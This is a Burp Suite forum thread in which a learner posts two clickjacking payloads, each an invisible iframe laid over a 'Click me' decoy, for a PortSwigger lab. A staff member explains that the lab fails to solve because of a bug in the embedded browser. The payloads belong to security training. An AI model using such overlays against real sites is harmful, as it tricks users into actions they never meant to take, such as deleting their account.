Research Academy
My account Customers About Blog Careers Legal Contact Resellers

Burp Suite User Forum

Create new post

Basic clickjacking with CSRF token protection remains unsolved

Tyla | Last updated: Apr 15, 2024 02:17AM UTC

i saw through other posts the burp embedded browser is not working and i tried through firefox with the same issue , only showing login screen instead of account screen with delete button. i was able to get the correct screen in chrome browser however the lab remains unsolved despite getting the iframe 'click me' aligned and delivering exploit. using this code with my lab id : <style> iframe { position:relative; width:500px; height: 700px; opacity: 0.00001; z-index: 2; } div { position:absolute; top:500px; left:60px; z-index: 1; } </style> <div>Click me</div> <iframe src="https://0a1100ce0470c99080d70d270075005e.web-security-academy.net/my-account?id=wiener"></iframe>

Tyla | Last updated: Apr 15, 2024 03:10AM UTC

i also tried the following on chrome browser . it aligns yet lab is not solved: <style> iframe { position:relative; width:100%; height: 100%; opacity: 0.0001; z-index: 2; } div { position:absolute; top:538px; left:100px; z-index: 1; } </style> <div>Click me</div> <iframe src="https://0a1100ce0470c99080d70d270075005e.web-security-academy.net/my-account?id=wiener"></iframe>

Dominyque, PortSwigger Agent | Last updated: Apr 15, 2024 10:04AM UTC

Hi There is currently an issue with solving the Clickjacking labs using the later version of the embedded browser (this is due to a flag being set within the browser that is not set by default for in normal versions of Chrome). Using a standard version of Chrome should still allow you to solve these labs in the interim (whilst we implement a more permanent solution).

You must be an existing, logged-in customer to reply to a thread. Please email us for additional support.